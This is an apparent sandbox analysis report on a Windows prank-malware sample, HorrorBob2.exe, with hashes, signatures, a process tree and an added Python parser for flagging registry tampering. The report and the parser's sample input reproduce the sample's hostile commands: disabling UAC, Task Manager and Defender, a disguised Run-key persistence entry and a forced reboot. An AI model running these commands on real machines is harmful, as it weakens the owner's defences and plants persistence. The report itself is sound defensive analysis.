Analysis
- max time kernel: 9s
- max time network: 12s
- platform: windows11-21h2_x64
- resource: win11-20241007-en
- resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 08-11-2024 14:13
Behavioral tasks (all run on resource win11-20241007-en)
- behavioral1: Dest/HorrorBob2.exe
- behavioral2: Dest/HorrorRansom 1.0 Final.exe
- behavioral3: Dest/HorrorTrojan Ultimate Edition.exe
- behavioral4: Dest/HorrorTrojan123.exe
- behavioral5: Dest/Start.bat
- behavioral6: Dest/covid20.exe
Errors
General
- Target: Dest/HorrorBob2.exe
- Size: 11.9MB
- MD5: 9331b20120075b2685d3888c196f2e34
- SHA1: 1af7d3dc4576ef8aaa06fa3199cf422b7657950b
- SHA256: 98a804d373c7e0e4f80155df20358436e066ecf31c522c31df2ba46923ac68c2
- SHA512: 83636067d46b1362a6e0e5af56222d170d337fa7b0c4048b8f04c9df0ca35c3634a7254e6226886b00f9894e4353d6ac6b2e4e760bab320058cebe37c7c0cd7b
- SSDEEP: 196608:zHvwfYWqhZPHE5D7cdPNPi17S+IRTX7UYVlj0EcLnKXanF6eeBUsjD2ABShiFiJt:vZ8R7c5527SpRTXQYVlYEGnKKF6eeWgO
Malware Config
Signatures
- UAC bypass
  Processes: reg.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
  The write to HKLM succeeded, so the sample was already running elevated (the sandbox user is Admin); this disables UAC for future elevations rather than bypassing it. EnableLUA only takes effect at the next boot, which the script forces with shutdown /r /t 00.
- Disables Task Manager via registry modification
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes: reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" (reg.exe)
  The command line asked for HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, but it was issued by the 32-bit reg.exe in C:\Windows\SysWOW64, so WOW64 registry redirection placed the value under WOW6432Node. A hunt that reads only the 64-bit Run key will miss this entry; check both views.
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: reg.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" (reg.exe)
- UPX packed file (YARA rule: upx)
  behavioral1/memory/2884-0-0x0000000000400000-0x000000000132F000-memory.dmp
  C:\Users\Admin\AppData\Local\Temp\A345.tmp\Service64.exe
  behavioral1/memory/2884-18-0x0000000000400000-0x000000000132F000-memory.dmp
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 13 IoCs)
  Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
  Processes, each of which opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language: reg.exe (six instances), rundll32.exe, net.exe, net1.exe, shutdown.exe, HorrorBob2.exe, cmd.exe, cscript.exe
  Every process in the tree, including the stock Windows binaries the batch file launched, triggers this, so it reflects routine process start-up rather than a deliberate locale check by the sample.
- Modifies data under HKEY_USERS (15 IoCs)
  Processes: LogonUI.exe
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM
  Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"
  Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "200"
  Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
  LogonUI.exe is the logon screen that appears after the forced shutdown /r; these DWM and accent-colour writes under HKU\.DEFAULT are its own theme handling, not activity of the sample.
- Modifies registry key (1 TTP, 3 IoCs)
  The process tree tags the DisableTaskMgr, NoChangingWallPaper and EnableLUA reg.exe calls with this signature.
- Runs net.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: shutdown.exe (PID 1044)
  Token: SeShutdownPrivilege
  Token: SeRemoteShutdownPrivilege
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes: LogonUI.exe (PID 1780)
- Suspicious use of WriteProcessMemory (36 IoCs)
  Each parent/child pair below was logged three times (one entry per WriteProcessMemory call during process creation), giving 12 unique pairs:
  PID 2884 HorrorBob2.exe wrote to memory of PID 3920 cmd.exe
  PID 3920 cmd.exe wrote to memory of PID 1320 cscript.exe
  PID 3920 cmd.exe wrote to memory of PID 2532 reg.exe
  PID 3920 cmd.exe wrote to memory of PID 4756 reg.exe
  PID 3920 cmd.exe wrote to memory of PID 244 rundll32.exe
  PID 3920 cmd.exe wrote to memory of PID 4840 reg.exe
  PID 3920 cmd.exe wrote to memory of PID 2368 reg.exe
  PID 3920 cmd.exe wrote to memory of PID 104 reg.exe
  PID 3920 cmd.exe wrote to memory of PID 4836 reg.exe
  PID 3920 cmd.exe wrote to memory of PID 4844 net.exe
  PID 4844 net.exe wrote to memory of PID 1264 net1.exe
  PID 3920 cmd.exe wrote to memory of PID 1044 shutdown.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe (PID 2884)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"
  System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 3920)
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat" "
    System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cscript.exe (PID 1320)
      Command line: cscript prompt.vbs
      System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\reg.exe (PID 2532)
      Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      System Location Discovery: System Language Discovery; Modifies registry key
    - C:\Windows\SysWOW64\reg.exe (PID 4756)
      Command line: reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
      Sets desktop wallpaper using registry; System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\rundll32.exe (PID 244)
      Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\reg.exe (PID 4840)
      Command line: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
      System Location Discovery: System Language Discovery; Modifies registry key
    - C:\Windows\SysWOW64\reg.exe (PID 2368)
      Command line: Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      System Location Discovery: System Language Discovery
      The DisableAntiSpyware policy value is ignored by Microsoft Defender on current Windows client builds, so on this Windows 11 image the write changes the registry without turning the engine off; the attempt is still worth alerting on.
    - C:\Windows\SysWOW64\reg.exe (PID 104)
      Command line: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      UAC bypass; System Location Discovery: System Language Discovery; Modifies registry key
    - C:\Windows\SysWOW64\reg.exe (PID 4836)
      Command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
      Adds Run key to start application; System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\net.exe (PID 4844)
      Command line: net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
      System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 1264)
        Command line: C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
        System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\shutdown.exe (PID 1044)
      Command line: shutdown /r /t 00
      System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\LogonUI.exe (PID 1780)
  Command line: "LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d
  Modifies data under HKEY_USERS; Suspicious use of SetWindowsHookEx
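The reg.exe calls in the process tree above, and the WOW6432Node path that the Run-key signature reports for one of them, are worth checking mechanically rather than by eye. The following Python is an added example written for this page; it is not part of the sandbox report or of the sample. It parses `reg add` command lines as they appear in a process tree, expands hive aliases, applies WOW64 registry redirection when the command was issued by the 32-bit reg.exe under SysWOW64 (or carries /reg:32), and classifies the effective key against a small tamper table. The tamper table, the verdict names and the list of shared HKLM\SOFTWARE subtrees (a subset of Microsoft's documented list, enough for the keys on this page) are this example's own assumptions; the sample command lines are copied from the process tree above.

```python
"""Added example: parse `reg add` command lines from a sandbox process tree,
apply WOW64 registry redirection for the 32-bit reg.exe, and classify the
effective key. The tamper table and shared-subtree list are assumptions made
for this example (the shared list is a subset of Microsoft's documented one)."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

HIVES = {
    "HKLM": "HKEY_LOCAL_MACHINE", "HKEY_LOCAL_MACHINE": "HKEY_LOCAL_MACHINE",
    "HKCU": "HKEY_CURRENT_USER", "HKEY_CURRENT_USER": "HKEY_CURRENT_USER",
    "HKU": "HKEY_USERS", "HKEY_USERS": "HKEY_USERS",
    "HKCR": "HKEY_CLASSES_ROOT", "HKEY_CLASSES_ROOT": "HKEY_CLASSES_ROOT",
}

# HKLM\SOFTWARE subtrees shared between the 32-bit and 64-bit views, so a
# 32-bit reg.exe writes them without a WOW6432Node prefix (assumption: subset).
SHARED_SUBTREES = (
    "SOFTWARE\\POLICIES",
    "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES",
)

# (effective key, value name, data) -> verdict; data None matches any data.
# Constructed for this example from the reg.exe calls in the report.
TAMPER_TABLE = {
    ("HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM",
     "ENABLELUA", "0"): "uac-disabled",
    ("HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM",
     "DISABLETASKMGR", "1"): "taskmgr-disabled",
    ("HKEY_LOCAL_MACHINE\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER",
     "DISABLEANTISPYWARE", "1"): "defender-policy-disabled",
    ("HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\ACTIVEDESKTOP",
     "NOCHANGINGWALLPAPER", "1"): "wallpaper-locked",
    ("HKEY_CURRENT_USER\\CONTROL PANEL\\DESKTOP", "WALLPAPER", None): "wallpaper-changed",
}
RUN_KEY = re.compile(r"\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN(ONCE)?$")


@dataclass
class RegAdd:
    image: str
    requested_key: str   # key exactly as typed on the command line
    effective_key: str   # after hive expansion and WOW64 redirection
    value: Optional[str]
    data: Optional[str]
    verdict: Optional[str]


def tokenize(cmd: str) -> List[str]:
    # cmd.exe-style quoting: double quotes group a token, backslashes are literal.
    return [q if q else w for q, w in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def expand_hive(key: str) -> str:
    hive, sep, rest = key.partition("\\")
    full = HIVES.get(hive.upper())
    if full is None:
        raise ValueError(f"unknown hive in {key!r}")
    return full + sep + rest


def redirect_wow64(key: str, is_32bit: bool, view: Optional[str]) -> str:
    """Return the key a 32-bit writer actually lands on. view is '32' or '64'
    when the command carried /reg:32 or /reg:64, which overrides image bitness."""
    use_32bit_view = is_32bit if view is None else view == "32"
    prefix = "HKEY_LOCAL_MACHINE\\"
    if not use_32bit_view or not key.upper().startswith(prefix + "SOFTWARE"):
        return key
    sub = key[len(prefix):]
    sub_u = sub.upper()
    if sub_u.startswith("SOFTWARE\\WOW6432NODE"):
        return key
    if any(sub_u == s or sub_u.startswith(s + "\\") for s in SHARED_SUBTREES):
        return key
    return prefix + "SOFTWARE\\WOW6432Node" + sub[len("SOFTWARE"):]


def classify(effective: str, value: Optional[str], data: Optional[str]) -> Optional[str]:
    key_u, val_u = effective.upper(), (value or "").upper()
    if RUN_KEY.search(key_u):
        return "run-key-persistence"
    return TAMPER_TABLE.get((key_u, val_u, data)) or TAMPER_TABLE.get((key_u, val_u, None))


def parse_reg_add(image: str, cmd: str) -> Optional[RegAdd]:
    """Parse one `reg add` invocation; returns None for anything else."""
    toks = tokenize(cmd)
    if len(toks) < 3 or toks[1].lower() != "add":
        return None
    if toks[0].rsplit("\\", 1)[-1].lower() not in ("reg", "reg.exe"):
        return None
    value = data = view = None
    i = 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag in ("/v", "/t", "/d") and i + 1 < len(toks):   # flags with an argument
            if flag == "/v":
                value = toks[i + 1]
            elif flag == "/d":
                data = toks[i + 1]
            i += 2
        else:                                                  # /f, /ve, /reg:NN
            if flag.startswith("/reg:"):
                view = flag[len("/reg:"):]
            i += 1
    is_32bit = "\\syswow64\\" in image.lower()
    effective = redirect_wow64(expand_hive(toks[2]), is_32bit, view)
    return RegAdd(image, toks[2], effective, value, data, classify(effective, value, data))


def analyze(process_tree: Iterable[Tuple[str, str]]) -> List[RegAdd]:
    """process_tree: (image path, command line) pairs as listed in a sandbox report."""
    return [r for r in (parse_reg_add(img, cmd) for img, cmd in process_tree) if r is not None]


# Sample input copied from the process tree in this report.
SAMPLE_TREE = [
    (r"C:\Windows\SysWOW64\cscript.exe", "cscript prompt.vbs"),
    (r"C:\Windows\SysWOW64\reg.exe", r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"),
    (r"C:\Windows\SysWOW64\reg.exe", r'reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f'),
    (r"C:\Windows\SysWOW64\reg.exe", r"reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f"),
    (r"C:\Windows\SysWOW64\reg.exe", r'Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    (r"C:\Windows\SysWOW64\reg.exe", r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),
    (r"C:\Windows\SysWOW64\reg.exe", r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"'),
]

if __name__ == "__main__":
    for hit in analyze(SAMPLE_TREE):
        print(f"{hit.verdict or 'unclassified':26} {hit.effective_key}\\{hit.value} = {hit.data!r}")
```

Run against the sample tree, the Run-key entry comes back with the WOW6432Node path the sandbox actually recorded, while the two Policies keys stay un-redirected because they sit in shared subtrees, which matches the IoCs in the Signatures section. Flag matching is case-insensitive and order-independent because the batch file mixes `/v` with `/V` and puts `/F` before `/D`; any parser that assumes `reg add KEY /v NAME /t TYPE /d DATA /f` in that order would drop the persistence entry.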
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (1): Disable or Modify Tools (1)
- Modify Registry (4)
Downloads
- Filesize: 5KB
  MD5: b11c0b55dba339bbe3169584fa0eedd8
  SHA1: 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
  SHA256: f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
  SHA512: 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006
- Filesize: 11.4MB
  MD5: b53852cb556ec28efc39b986caddb791
  SHA1: 5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a
  SHA256: ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a
  SHA512: 7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599
- Filesize: 3.8MB
  MD5: 040d29b801e3488f7aee3f9708128eea
  SHA1: 433591a971325f7529cbb7a1d16645ff65ee10c7
  SHA256: fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de
  SHA512: 79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826
- Filesize: 207B
  MD5: 52ac951762c9b42fb4492dfdde2ba4ae
  SHA1: 0821a0dea46432fc4db10a2dc6312d42a872ab9f
  SHA256: 9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3
  SHA512: c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530